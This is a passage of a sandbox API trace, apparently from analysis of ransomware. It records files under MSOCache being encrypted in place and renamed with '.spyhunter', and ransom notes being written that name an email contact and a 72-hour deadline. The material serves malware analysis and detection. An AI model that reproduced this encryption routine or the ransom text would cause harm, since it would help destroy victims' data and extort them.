[0078.045] Sleep (dwMilliseconds=0x3e8) [0081.587] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cff10 | out: pbBuffer=0x25cff10) returned 1 [0081.871] GetProcessHeap () returned 0x2c0000 [0081.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0081.871] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cff08*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cff08*=0x30) returned 1 [0081.872] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0081.872] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0081.872] StrStrW (lpFirst="Proofing.xml", lpSrch=".txt") returned 0x0 [0081.872] GetProcessHeap () returned 0x2c0000 [0081.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32c608 [0081.872] ReadFile (in: hFile=0xb4, lpBuffer=0x32c608, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfecc, lpOverlapped=0x0 | out: lpBuffer=0x32c608*, lpNumberOfBytesRead=0x25cfecc*=0x32b, lpOverlapped=0x0) returned 1 [0082.007] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffcd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.007] WriteFile (in: hFile=0xb4, lpBuffer=0x32c608*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x25cfecc, lpOverlapped=0x0 | out: lpBuffer=0x32c608*, lpNumberOfBytesWritten=0x25cfecc*=0x32b, lpOverlapped=0x0) returned 1 [0082.008] GetProcessHeap () returned 0x2c0000 [0082.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c608 | out: hHeap=0x2c0000) returned 1 [0082.008] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.008] WriteFile (in: hFile=0xb4, lpBuffer=0x25cff0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfecc, lpOverlapped=0x0 | out: lpBuffer=0x25cff0c*, lpNumberOfBytesWritten=0x25cfecc*=0x4, lpOverlapped=0x0) returned 1 [0082.008] WriteFile (in: hFile=0xb4, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfecc, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x25cfecc*=0x30, lpOverlapped=0x0) returned 1 [0082.008] CloseHandle (hObject=0xb4) returned 1 [0082.009] GetProcessHeap () returned 0x2c0000 [0082.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0082.009] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.spyhunter") returned 89 [0082.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.spyhunter")) returned 1 [0082.010] GetProcessHeap () returned 0x2c0000 [0082.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0082.010] GetProcessHeap () returned 0x2c0000 [0082.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0082.010] GetProcessHeap () returned 0x2c0000 [0082.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320f18 | out: hHeap=0x2c0000) returned 1 [0082.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cff08 | out: pbBuffer=0x25cff08) returned 1 [0082.010] GetProcessHeap () returned 0x2c0000 [0082.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0082.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cff00*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cff00*=0x30) returned 1 [0082.010] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0082.023] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 78 [0082.023] StrStrW (lpFirst="OnoteLR.cab", lpSrch=".txt") returned 0x0 [0082.023] GetProcessHeap () returned 0x2c0000 [0082.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x32e608 [0082.023] ReadFile (in: hFile=0xb4, lpBuffer=0x32e608, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfec4, lpOverlapped=0x0 | out: lpBuffer=0x32e608*, lpNumberOfBytesRead=0x25cfec4*=0x2800, lpOverlapped=0x0) returned 1 [0082.056] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.056] WriteFile (in: hFile=0xb4, lpBuffer=0x32e608*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfec4, lpOverlapped=0x0 | out: lpBuffer=0x32e608*, lpNumberOfBytesWritten=0x25cfec4*=0x2800, lpOverlapped=0x0) returned 1 [0082.056] GetProcessHeap () returned 0x2c0000 [0082.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e608 | out: hHeap=0x2c0000) returned 1 [0082.056] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.056] WriteFile (in: hFile=0xb4, lpBuffer=0x25cff04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfec4, lpOverlapped=0x0 | out: lpBuffer=0x25cff04*, lpNumberOfBytesWritten=0x25cfec4*=0x4, lpOverlapped=0x0) returned 1 [0082.105] WriteFile (in: hFile=0xb4, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfec4, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x25cfec4*=0x30, lpOverlapped=0x0) returned 1 [0082.105] CloseHandle (hObject=0xb4) returned 1 [0084.245] GetProcessHeap () returned 0x2c0000 [0084.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0084.245] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.spyhunter") returned 88 [0084.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.spyhunter")) returned 1 [0084.246] GetProcessHeap () returned 0x2c0000 [0084.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.246] GetProcessHeap () returned 0x2c0000 [0084.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0084.246] GetProcessHeap () returned 0x2c0000 [0084.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326430 | out: hHeap=0x2c0000) returned 1 [0084.246] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cff08 | out: pbBuffer=0x25cff08) returned 1 [0084.246] GetProcessHeap () returned 0x2c0000 [0084.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0084.246] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cff00*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cff00*=0x30) returned 1 [0084.246] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.247] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0084.247] StrStrW (lpFirst="AccessMUISet.xml", lpSrch=".txt") returned 0x0 [0084.247] GetProcessHeap () returned 0x2c0000 [0084.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x33efe8 [0084.247] ReadFile (in: hFile=0xb4, lpBuffer=0x33efe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfec4, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesRead=0x25cfec4*=0x333, lpOverlapped=0x0) returned 1 [0084.336] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.336] WriteFile (in: hFile=0xb4, lpBuffer=0x33efe8*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x25cfec4, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesWritten=0x25cfec4*=0x333, lpOverlapped=0x0) returned 1 [0084.336] GetProcessHeap () returned 0x2c0000 [0084.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.336] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.336] WriteFile (in: hFile=0xb4, lpBuffer=0x25cff04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfec4, lpOverlapped=0x0 | out: lpBuffer=0x25cff04*, lpNumberOfBytesWritten=0x25cfec4*=0x4, lpOverlapped=0x0) returned 1 [0084.336] WriteFile (in: hFile=0xb4, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfec4, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x25cfec4*=0x30, lpOverlapped=0x0) returned 1 [0084.337] CloseHandle (hObject=0xb4) returned 1 [0084.337] GetProcessHeap () returned 0x2c0000 [0084.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0084.337] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.spyhunter") returned 93 [0084.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.spyhunter")) returned 1 [0084.338] GetProcessHeap () returned 0x2c0000 [0084.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.338] GetProcessHeap () returned 0x2c0000 [0084.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0084.338] GetProcessHeap () returned 0x2c0000 [0084.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328198 | out: hHeap=0x2c0000) returned 1 [0084.338] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cff00 | out: pbBuffer=0x25cff00) returned 1 [0084.338] GetProcessHeap () returned 0x2c0000 [0084.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0084.338] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cfef8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cfef8*=0x30) returned 1 [0084.338] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.339] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0084.339] StrStrW (lpFirst="AccessMUISet.msi", lpSrch=".txt") returned 0x0 [0084.339] GetProcessHeap () returned 0x2c0000 [0084.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x33efe8 [0084.339] ReadFile (in: hFile=0xb4, lpBuffer=0x33efe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfebc, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesRead=0x25cfebc*=0x2800, lpOverlapped=0x0) returned 1 [0084.375] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.375] WriteFile (in: hFile=0xb4, lpBuffer=0x33efe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfebc, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesWritten=0x25cfebc*=0x2800, lpOverlapped=0x0) returned 1 [0084.375] GetProcessHeap () returned 0x2c0000 [0084.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.375] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.375] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfefc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfebc, lpOverlapped=0x0 | out: lpBuffer=0x25cfefc*, lpNumberOfBytesWritten=0x25cfebc*=0x4, lpOverlapped=0x0) returned 1 [0084.390] WriteFile (in: hFile=0xb4, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfebc, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x25cfebc*=0x30, lpOverlapped=0x0) returned 1 [0084.390] CloseHandle (hObject=0xb4) returned 1 [0084.531] GetProcessHeap () returned 0x2c0000 [0084.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x34f030 [0084.531] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.spyhunter") returned 93 [0084.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.spyhunter" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.spyhunter")) returned 1 [0084.531] GetProcessHeap () returned 0x2c0000 [0084.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f030 | out: hHeap=0x2c0000) returned 1 [0084.531] GetProcessHeap () returned 0x2c0000 [0084.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0084.532] GetProcessHeap () returned 0x2c0000 [0084.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328288 | out: hHeap=0x2c0000) returned 1 [0084.532] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.532] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.532] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfe33*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff5c, lpOverlapped=0x0 | out: lpBuffer=0x25cfe33*, lpNumberOfBytesWritten=0x25cff5c*=0x127, lpOverlapped=0x0) returned 1 [0084.533] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.533] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff5c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff5c*=0x2ac, lpOverlapped=0x0) returned 1 [0084.534] CloseHandle (hObject=0xb4) returned 1 [0084.534] GetProcessHeap () returned 0x2c0000 [0084.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328468 | out: hHeap=0x2c0000) returned 1 [0084.534] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfef8 | out: pbBuffer=0x25cfef8) returned 1 [0084.534] GetProcessHeap () returned 0x2c0000 [0084.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0084.534] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cfef0*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cfef0*=0x30) returned 1 [0084.534] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.535] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.535] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0084.535] GetProcessHeap () returned 0x2c0000 [0084.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34f030 [0084.535] ReadFile (in: hFile=0xb4, lpBuffer=0x34f030, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfeb4, lpOverlapped=0x0 | out: lpBuffer=0x34f030*, lpNumberOfBytesRead=0x25cfeb4*=0x2800, lpOverlapped=0x0) returned 1 [0084.614] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.614] WriteFile (in: hFile=0xb4, lpBuffer=0x34f030*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfeb4, lpOverlapped=0x0 | out: lpBuffer=0x34f030*, lpNumberOfBytesWritten=0x25cfeb4*=0x2800, lpOverlapped=0x0) returned 1 [0084.614] GetProcessHeap () returned 0x2c0000 [0084.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f030 | out: hHeap=0x2c0000) returned 1 [0084.614] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.614] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfef4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfeb4, lpOverlapped=0x0 | out: lpBuffer=0x25cfef4*, lpNumberOfBytesWritten=0x25cfeb4*=0x4, lpOverlapped=0x0) returned 1 [0084.615] WriteFile (in: hFile=0xb4, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfeb4, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x25cfeb4*=0x30, lpOverlapped=0x0) returned 1 [0084.615] CloseHandle (hObject=0xb4) returned 1 [0084.616] GetProcessHeap () returned 0x2c0000 [0084.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x341830 [0084.616] wnsprintfW (in: pszDest=0x341830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.spyhunter") returned 86 [0084.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.spyhunter")) returned 1 [0084.616] GetProcessHeap () returned 0x2c0000 [0084.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x341830 | out: hHeap=0x2c0000) returned 1 [0084.616] GetProcessHeap () returned 0x2c0000 [0084.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0084.616] GetProcessHeap () returned 0x2c0000 [0084.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326e28 | out: hHeap=0x2c0000) returned 1 [0084.616] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.617] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.617] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfe2b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff54, lpOverlapped=0x0 | out: lpBuffer=0x25cfe2b*, lpNumberOfBytesWritten=0x25cff54*=0x127, lpOverlapped=0x0) returned 1 [0084.618] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.618] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff54, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff54*=0x2ac, lpOverlapped=0x0) returned 1 [0084.618] CloseHandle (hObject=0xb4) returned 1 [0084.618] GetProcessHeap () returned 